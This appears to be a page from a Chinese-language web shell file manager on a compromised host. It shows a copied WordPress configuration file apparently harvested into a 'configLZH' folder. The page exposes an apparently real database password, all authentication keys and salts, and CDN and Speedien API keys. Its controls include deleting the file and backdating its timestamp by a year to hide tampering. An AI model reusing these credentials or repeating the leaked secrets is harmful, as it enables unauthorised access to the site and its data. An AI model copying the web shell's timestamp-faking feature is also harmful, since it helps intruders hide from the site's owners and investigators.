文件操作 - 50-WordPress-public_html.txt
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/rokpawnew/public_html/configLZH/50-WordPress-public_html.txt
编辑文件内容
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'fortetemplatedb' ); /** Database username */ define( 'DB_USER', 'fortetemplatedbuser' ); /** Database password */ define( 'DB_PASSWORD', 'jQ7518e01ae2hJ8RRd' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'YE1m|^(|Hss}v|.b#,X+a|@O.m<{?`yk.(m3|auOQ)z(ZX/F!Uwm;,t[@ivBsjV6' ); define( 'SECURE_AUTH_KEY', 'pTA>+r9O2.~5U,C|Q3tcVStabe`v6J@i,+=GZs*(R,T*$`9SlQ)mr-=Is*RQ}1~a' ); define( 'LOGGED_IN_KEY', 'Rf:E,tTfe4g[~=<*y0C:(m>/+E:zHBpD`fA5>?Ei%G~;2[zR3`B};|KK/P&K `81' ); define( 'NONCE_KEY', 'LL1USEya`v98%0DP?`-m@c~e}@B|O#dq!=v>_H6-$3iWTS%?s8kKLl(GKhu3)>Lz' ); define( 'AUTH_SALT', 'YYY~H3`wHXsJ?,M#mn*X2xRx n>W@`1aTjfQ:8&?^v6DXl#{.yEiTcXHg-52m.A6' ); define( 'SECURE_AUTH_SALT', ')CbdiM3.9YwsxsmY,`.]{Wx]xu)d!GS[}38U9_Dh1yGtY!/c!Dp{3t`VA*E?kQkP' ); define( 'LOGGED_IN_SALT', 'O<:cBy-!w0Ck[bhWV~x+b~swI?hMs>6YW^6d^wX+ 7~tu4~GdjhmH.R)CAys<qs2' ); define( 'NONCE_SALT', 'VH6U;i]b);AYZA3.lR9O/jt5Gu]}~52tS!w+Em#^g7:Z/YO>|DN7x}ehBX@YZ+%5' ); define( 'WP_CACHE_KEY_SALT', '0-M9# W^#b;|W<qeR15&~=T+Ma8gz1 sR)++dl+E(7DCJ(Bv:JD6yt%,_&{Kg~RA' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); define( 'WP_DEBUG_LOG', false ); define( 'FS_METHOD', 'direct' ); define( 'WP_MEMORY_LIMIT', '2560M' ); define( 'CDN_SITE_ID', 'DMk3xtiWWCQ6sCRDQ4pj7ACwq' ); define( 'SPEEDIEN_API_KEY', '921c4579666f846a5a78fb3fd9e1a645' ); define( 'SPEEDIEN_SITE_ID', 'e178c3e07ec144e431eb2f609a0688e3' ); define( 'WP_CACHE', 'false' ); define( 'SPEEDIEN_CSS', '1' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
修改文件时间
将文件时间修改为当前时间的前一年
删除文件